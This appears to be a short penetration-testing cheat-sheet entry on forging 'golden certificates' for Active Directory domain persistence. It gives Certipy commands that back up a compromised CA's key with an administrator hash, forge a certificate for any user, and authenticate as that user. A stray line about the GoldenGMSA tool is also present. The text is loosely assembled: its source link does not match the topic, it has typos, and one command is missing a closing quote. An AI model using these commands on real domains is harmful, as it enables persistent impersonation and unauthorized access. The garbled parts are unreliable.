https://pentestlab.blog/2021/05/17/persistence-amsi/
This is a technique for domain persistence after compromising the CA server or domain. It’s an alternative to “Golden Tickets”, but instead of forging tickets, you can forge certificates that can be used for Kerberos authentication.
Once you have DA access on a domain create a master certificate using:
Certipy.py ca 'domain/[email protected]' -hashes :administraotrntlmhash -backup
Then you can forge any ticket using:
certipy.py forge -ca-pfx 'administrator.pfx' -subject 'DC=corp.DC=local,CN=Users,CN=John' -alt '[email protected]
And authneticate using the forged cert:
Certipy.py auth -pfx 'john.pfx'
Resource: https://research.ifcr.dk/certipy-2-0-bloodhound-new-escalations-shadow-credentials-golden-certificates-and-more-34d1c26f0dc6
GoldenGMSA is a C# tool for abusing Group Managed Service Accounts (gMSA) in Active Directory.